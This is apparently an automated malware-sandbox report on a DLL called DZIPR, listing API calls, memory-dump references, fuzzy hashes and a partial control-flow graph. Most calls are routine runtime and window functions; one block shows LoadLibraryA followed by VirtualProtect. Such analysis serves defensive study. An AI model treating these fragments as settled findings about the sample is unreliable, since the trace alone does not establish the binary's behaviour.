                          • __EH_prolog3.LIBCMT ref: 6C536A8A
                            • Part of subcall function 6C5368E2: _malloc.LIBCMT ref: 6C536900
                          • __CxxThrowException@8.LIBCMT ref: 6C536AC0
                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6C5316A6,00000000,00000000,?,?,6C55D898,00000004,6C5316A6,00000000,6C5369F9,00000000), ref: 6C536AEA
                          • LocalFree.KERNEL32(6C5316A6,6C5316A6,00000000,6C5369F9,00000000), ref: 6C536B12
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                          • String ID:
                          • API String ID: 1776251131-0
                          • Opcode ID: 744afc6de14b4ae3254231290ed695e4287e017bc00dfdf24b613319aa60b652
                          • Instruction ID: 91ecefc2ab6eaf61c9dfec35b2f06be71928efa07c1dcbb0125e8a192de8eee8
                          • Opcode Fuzzy Hash: 744afc6de14b4ae3254231290ed695e4287e017bc00dfdf24b613319aa60b652
                          • Instruction Fuzzy Hash: C5115E71640359EFDF04DF68CC409A93BB5FF88314F60C929F529CA6A0EB3189508B54
                          APIs
                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6C53D194
                          • RegCloseKey.ADVAPI32(00000000), ref: 6C53D19D
                          • swprintf.LIBCMT ref: 6C53D1BA
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C53D1CB
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                          • String ID:
                          • API String ID: 22681860-0
                          • Opcode ID: fd6c587b6df0635d9d03aae504cd13ec738be10442905cf245600e17a5d2944a
                          • Instruction ID: 6b457326f0396c9ce4a97cde7bac59055c16bb5b3cf2abe676912822bf37eee1
                          • Opcode Fuzzy Hash: fd6c587b6df0635d9d03aae504cd13ec738be10442905cf245600e17a5d2944a
                          • Instruction Fuzzy Hash: F901AD72650318BBDB009A68CC85FAF77BCAF8A708F51041AF901A7640EB74ED0887A4
                          APIs
                            • Part of subcall function 6C5368E2: _malloc.LIBCMT ref: 6C536900
                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6C5372BB
                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 6C5372C1
                          • DuplicateHandle.KERNEL32(00000000), ref: 6C5372C4
                          • GetLastError.KERNEL32(?), ref: 6C5372DF
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                          • String ID:
                          • API String ID: 3704204646-0
                          • Opcode ID: 9aa172bc481465855ff228e0f005d7a9bf8618cc46cf24b1585d51bdc5fda1c7
                          • Instruction ID: fa0dc09aa0aa94ca8da94a10c6eccb70ce3284d6f0ca55d426a5bebc0638797c
                          • Opcode Fuzzy Hash: 9aa172bc481465855ff228e0f005d7a9bf8618cc46cf24b1585d51bdc5fda1c7
                          • Instruction Fuzzy Hash: 82017131B40615EBDB009BA6CD89F5A7BA9EFC5794F254415F908CB641EF71DC008B64
                          APIs
                          • GetTopWindow.USER32(?), ref: 6C540F9D
                          • GetTopWindow.USER32(00000000), ref: 6C540FDC
                          • GetWindow.USER32(00000000,00000002), ref: 6C540FFA
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: Window
                          • String ID:
                          • API String ID: 2353593579-0
                          • Opcode ID: 4922f0e6e4d3929a68ac80751ffe04282fe4b419d26881ad6c24ae063daa4979
                          • Instruction ID: 567fdddfa673031b5207004eb288e27c79d8088d5d00ece3f5e8a5108e3850c7
                          • Opcode Fuzzy Hash: 4922f0e6e4d3929a68ac80751ffe04282fe4b419d26881ad6c24ae063daa4979
                          • Instruction Fuzzy Hash: C8014C3214569AFBCF026F958D08EDF3F26AF993A5F218022FA1451520C736C572EBA5
                          APIs
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                          • Instruction ID: bdb0c8eb074e32115dd1a2be93897af1a7d936da3cc35cdfc4313cca5a143caa
                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                          • Instruction Fuzzy Hash: C8117E7244018ABBCF129F84DC018EE7F62BB59358B148814FA2859530C772CAB1AB81
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 6C5403DC
                          • GetTopWindow.USER32(00000000), ref: 6C5403EF
                            • Part of subcall function 6C5403CF: GetWindow.USER32(00000000,00000002), ref: 6C540436
                          • GetTopWindow.USER32(?), ref: 6C54041F
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$Item
                          • String ID:
                          • API String ID: 369458955-0
                          • Opcode ID: 0e9440e92cc3eff63e80516a5c11eb177f4a15281ee46643ca23763a1d9ca5a1
                          • Instruction ID: 4f9f49c4ccbf115d563ad0a2ff61ca4b81e7d9b602149227891c13165ed83f0d
                          • Opcode Fuzzy Hash: 0e9440e92cc3eff63e80516a5c11eb177f4a15281ee46643ca23763a1d9ca5a1
                          • Instruction Fuzzy Hash: 6301D43214559AA78B122E218C04ECF3B79AFE13A5B65C123FD1895901E730C9119696
                          APIs
                          • GetSystemMetrics.USER32(0000000B), ref: 6C53CD75
                          • GetSystemMetrics.USER32(0000000C), ref: 6C53CD7C
                          • GetSystemMetrics.USER32(00000002), ref: 6C53CD83
                          • GetSystemMetrics.USER32(00000003), ref: 6C53CD8D
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: MetricsSystem
                          • String ID:
                          • API String ID: 4116985748-0
                          • Opcode ID: e3f5f56ca6579bea771263c53561362fc010282d515134d66b93251521715cee
                          • Instruction ID: ce967d310dd3bf049977b24fcb95eccc058d6229abfa78d264c87999c5335642
                          • Opcode Fuzzy Hash: e3f5f56ca6579bea771263c53561362fc010282d515134d66b93251521715cee
                          • Instruction Fuzzy Hash: 29F06DB1F80714BBEB105F728C49F267F78EB42721F024517E6048B280CBB598008FD4
                          APIs
                          • RtlEnterCriticalSection.NTDLL(6C5634A8), ref: 6C53C25A
                          • RtlInitializeCriticalSection.NTDLL(?), ref: 6C53C26C
                          • RtlLeaveCriticalSection.NTDLL(6C5634A8), ref: 6C53C279
                          • RtlEnterCriticalSection.NTDLL(?), ref: 6C53C289
                            • Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
                            • Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                          • String ID:
                          • API String ID: 2895727460-0
                          • Opcode ID: a30d39d77fe7382878975db070f43ff2395809aa02af90b195782b2eab319405
                          • Instruction ID: cea0ded3ee4f02df64a84acdbe6bd51c0a6c4932eb7176c17c907f488bb85993
                          • Opcode Fuzzy Hash: a30d39d77fe7382878975db070f43ff2395809aa02af90b195782b2eab319405
                          • Instruction Fuzzy Hash: BCF0FC73200134AFCB002A9ACC45B15BB79EBD2315F561516F14883D11EF30A440CA69
                          APIs
                          • RtlEnterCriticalSection.NTDLL(6C5632EC), ref: 6C53BA69
                          • TlsGetValue.KERNEL32(6C5632D0,?,?,?,?,6C53C0B7,?,00000004,6C53AF00,6C536DDD,6C5368AD,?,6C544902,?), ref: 6C53BA7D
                          • RtlLeaveCriticalSection.NTDLL(6C5632EC), ref: 6C53BA93
                          • RtlLeaveCriticalSection.NTDLL(6C5632EC), ref: 6C53BA9E
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$EnterValue
                          • String ID:
                          • API String ID: 3969253408-0
                          • Opcode ID: dc607467f9c3e4e93e56f3eeb274dbe908059b77f0d99056ca85ebd717306f1d
                          • Instruction ID: 7947912ed56899dbb50e9aff3540f80731eb0f3bed96af294ee8db2fa711fb98
                          • Opcode Fuzzy Hash: dc607467f9c3e4e93e56f3eeb274dbe908059b77f0d99056ca85ebd717306f1d
                          • Instruction Fuzzy Hash: 45F05E76354A189FD720AF68CC88C0AB7BDEB8536431A5426F66D93601EA30F8459BA1
                          APIs
                          • __getptd.LIBCMT ref: 6C550586
                            • Part of subcall function 6C54A27F: __getptd_noexit.LIBCMT ref: 6C54A282
                            • Part of subcall function 6C54A27F: __amsg_exit.LIBCMT ref: 6C54A28F
                          • __getptd.LIBCMT ref: 6C55059D
                          • __amsg_exit.LIBCMT ref: 6C5505AB
                          • __lock.LIBCMT ref: 6C5505BB
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                          • String ID:
                          • API String ID: 3521780317-0
                          • Opcode ID: 651ad498443fd8baf03e33ae889be52a949b81f198ee3b53da07d3775d53b46b
                          • Instruction ID: 41d93554cd4cf6e2ceedfd1ad8e201ca54a85253a773af88d0a120ff6ca8528c
                          • Opcode Fuzzy Hash: 651ad498443fd8baf03e33ae889be52a949b81f198ee3b53da07d3775d53b46b
                          • Instruction Fuzzy Hash: FCF0F032901310CBDB21AF688C0578C33A06BC072CFD1861BD441A7FE1CB74AD05CB51
                          APIs
                          • _memset.LIBCMT ref: 6C54029B
                          • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6C5402C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: MessageSend_memset
                          • String ID: ,
                          • API String ID: 1827994538-3772416878
                          • Opcode ID: a2c439a71a0fbdbf5b8f52f230288525ccdacce6a4bd79c40f50a447ff3079e1
                          • Instruction ID: d496f66de9fe350538faf560853e6fbe3a13d4e97a5f1ed68d43d8e451698ea2
                          • Opcode Fuzzy Hash: a2c439a71a0fbdbf5b8f52f230288525ccdacce6a4bd79c40f50a447ff3079e1
                          • Instruction Fuzzy Hash: 3131F030205350EFDB109FB5CC84A9EB7F5BFC8318B25422EE55697A90EB30E804CB54
                          APIs
                            • Part of subcall function 6C53A59C: GetModuleHandleW.KERNEL32(KERNEL32,6C53A6B6), ref: 6C53A5AA
                            • Part of subcall function 6C53A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C53A5CB
                            • Part of subcall function 6C53A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C53A5DD
                            • Part of subcall function 6C53A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C53A5EF
                            • Part of subcall function 6C53A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C53A601
                          • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C53A6D0
                          • SetLastError.KERNEL32(0000006F), ref: 6C53A6E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$Module$ErrorFileHandleLastName
                          • String ID:
                          • API String ID: 2524245154-3916222277
                          • Opcode ID: 414a20cbd89a7e3372e0b917840d29690056fa5bbaab2112c947fe438360507d
                          • Instruction ID: 111da6882df8f30cbd4ad303514501fb73323b0aac8ce3624a2e48c8a751bc28
                          • Opcode Fuzzy Hash: 414a20cbd89a7e3372e0b917840d29690056fa5bbaab2112c947fe438360507d
                          • Instruction Fuzzy Hash: 1B214F7091022C9EDB20DFB5CC9C7DEB7B8BF54328F108699D069D6280EB745A89CF55
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6C538E78
                          • PathFindExtensionW.SHLWAPI(?), ref: 6C538E8E
                            • Part of subcall function 6C538BDF: __EH_prolog3_GS.LIBCMT ref: 6C538BE9
                            • Part of subcall function 6C538BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C538EB7,?,?), ref: 6C538C19
                            • Part of subcall function 6C538BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C538C2D
                            • Part of subcall function 6C538BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C538C69
                            • Part of subcall function 6C538BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C538C77
                            • Part of subcall function 6C538BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C538C94
                            • Part of subcall function 6C538BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6C538CBF
                            • Part of subcall function 6C538BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C538CC8
                            • Part of subcall function 6C538BDF: GetModuleFileNameW.KERNEL32(6C530000,?,00000105), ref: 6C538D7F
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                          • String ID: %s%s.dll
                          • API String ID: 1311856149-1649984862
                          • Opcode ID: d0d32027c938ddff1eecbde857f7ddacba1281ee1c766f0ae70f88927434f91d
                          • Instruction ID: 8182582bfe700338f7dbe194d35f0b626899695c9d57cb303225900237e6298b
                          • Opcode Fuzzy Hash: d0d32027c938ddff1eecbde857f7ddacba1281ee1c766f0ae70f88927434f91d
                          • Instruction Fuzzy Hash: 9401A271A15128EBCB05CBA8DC859EFB7F9AF49304F51046BA409EB140EA70DA088B95
                          APIs
                            • Part of subcall function 6C545017: __getptd.LIBCMT ref: 6C54501D
                            • Part of subcall function 6C545017: __getptd.LIBCMT ref: 6C54502D
                          • __getptd.LIBCMT ref: 6C54C54B
                            • Part of subcall function 6C54A27F: __getptd_noexit.LIBCMT ref: 6C54A282
                            • Part of subcall function 6C54A27F: __amsg_exit.LIBCMT ref: 6C54A28F
                          • __getptd.LIBCMT ref: 6C54C559
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: csm
                          • API String ID: 803148776-1018135373
                          • Opcode ID: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                          • Instruction ID: a4bc0c7a0a0d489d142b9916b2f89e7c006702e7fe04f6966c797d431be211d1
                          • Opcode Fuzzy Hash: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                          • Instruction Fuzzy Hash: 0A018F78805201DBCF20BF61CC446DDBBB5AF90319F64842ED44096E91EB31A998DF51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: H_prolog3
                          • String ID: PVl$xPVl
                          • API String ID: 431132790-1350471361
                          • Opcode ID: 35786514d7a8a681dab92d45033bcb183361e452071d32c7c9e1a729f4d6905e
                          • Instruction ID: 92bac4cfa5ed725665778d68288b38aa0e3317bcb63d73cd47f314dc26fc1ded
                          • Opcode Fuzzy Hash: 35786514d7a8a681dab92d45033bcb183361e452071d32c7c9e1a729f4d6905e
                          • Instruction Fuzzy Hash: EAF0F472902361CBDB649B658D85BADB3E06F94319FB1860FD4A64BEA0C7748C64C682
                          APIs
                          • _memset.LIBCMT ref: 6C537318
                          • PathStripToRootW.SHLWAPI(00000000,00000104,00000000,00000104,?,6C537540,00000000,?), ref: 6C53732D
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: PathRootStrip_memset
                          • String ID: @uSl
                          • API String ID: 2213896960-1039666814
                          • Opcode ID: e3e94d6848c7d4a1dd06e98622d92f456a72ff80c9d3a47207da30903645cc09
                          • Instruction ID: 7c1cfbc7a3eb326548a3862751ff10ab039e873ab825b715d00f8446856c9f23
                          • Opcode Fuzzy Hash: e3e94d6848c7d4a1dd06e98622d92f456a72ff80c9d3a47207da30903645cc09
                          • Instruction Fuzzy Hash: 3DE09A33100024B7C6016A998C44EFF3B6D9FC66B4F608215FA2856AD1AF60A91596B6

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 25 6fd063f0-6fd063f8 26 6fd0649c-6fd064c1 25->26 27 6fd063fe-6fd0640f 25->27 28 6fd064c3 26->28 29 6fd06524 26->29 30 6fd06413-6fd0641e 27->30 31 6fd064c5-6fd064cb 28->31 34 6fd06526-6fd06551 29->34 32 6fd06420 30->32 33 6fd06481 30->33 31->31 36 6fd064cd-6fd064cf 31->36 37 6fd06422-6fd06427 32->37 35 6fd06483-6fd06487 33->35 38 6fd065f1 34->38 39 6fd06557-6fd06568 34->39 40 6fd0671b-6fd0671e 35->40 41 6fd0648d-6fd06492 35->41 36->29 43 6fd064d1-6fd064d7 36->43 37->37 44 6fd06429-6fd0642b 37->44 42 6fd065f3-6fd06661 LoadLibraryA VirtualProtect call 6fd067f8 VirtualProtect 38->42 45 6fd0656c-6fd06577 39->45 41->30 46 6fd06498 41->46 62 6fd06682-6fd066a9 42->62 63 6fd06663 42->63 48 6fd066f0 43->48 49 6fd064dd-6fd064e6 43->49 44->33 50 6fd0642d-6fd06433 44->50 51 6fd06579 45->51 52 6fd065da 45->52 46->26 55 6fd064ea-6fd06501 49->55 56 6fd066e6 50->56 57 6fd06439-6fd06443 50->57 58 6fd0657b-6fd06580 51->58 54 6fd065dc-6fd065e0 52->54 59 6fd06704-6fd06716 54->59 60 6fd065e6-6fd065eb 54->60 55->55 61 6fd06503-6fd06513 55->61 66 6fd066fa 56->66 64 6fd06447-6fd0645e 57->64 58->58 65 6fd06582-6fd06584 58->65 59->42 60->38 60->45 61->34 67 6fd06515-6fd06522 61->67 68 6fd06667-6fd06680 63->68 64->64 69 6fd06460-6fd06471 64->69 65->52 70 6fd06586-6fd0658c 65->70 66->59 67->34 68->62 68->68 69->35 72 6fd06473-6fd0647f 69->72 70->66 73 6fd06592-6fd0659c 70->73 72->35 74 6fd065a0-6fd065b7 73->74 74->74 75 6fd065b9-6fd065ca 74->75 75->54 76 6fd065cc-6fd065d8 75->76 76->54
                          APIs
                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FD06602
                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FD0663B
                          • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FD06654
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: ProtectVirtual$LibraryLoad
                          • String ID:
                          • API String ID: 895956442-0
                          • Opcode ID: 8a459d540d555f948c4b4a3cf1bfaeb95bb47b02068f64583507f30ccd888f73
                          • Instruction ID: 670a35c1f06ebaee90fa672aeb1907094d93b1c44b1e75ee1176e2ab4b36fb40
                          • Opcode Fuzzy Hash: 8a459d540d555f948c4b4a3cf1bfaeb95bb47b02068f64583507f30ccd888f73
                          • Instruction Fuzzy Hash: 13A1BB3190C7568FC355DF28C48062EBBE2BF8A308F09896EE89597246D630F991CB91

                          Control-flow Graph

                          • Executed
                          • Not Executed
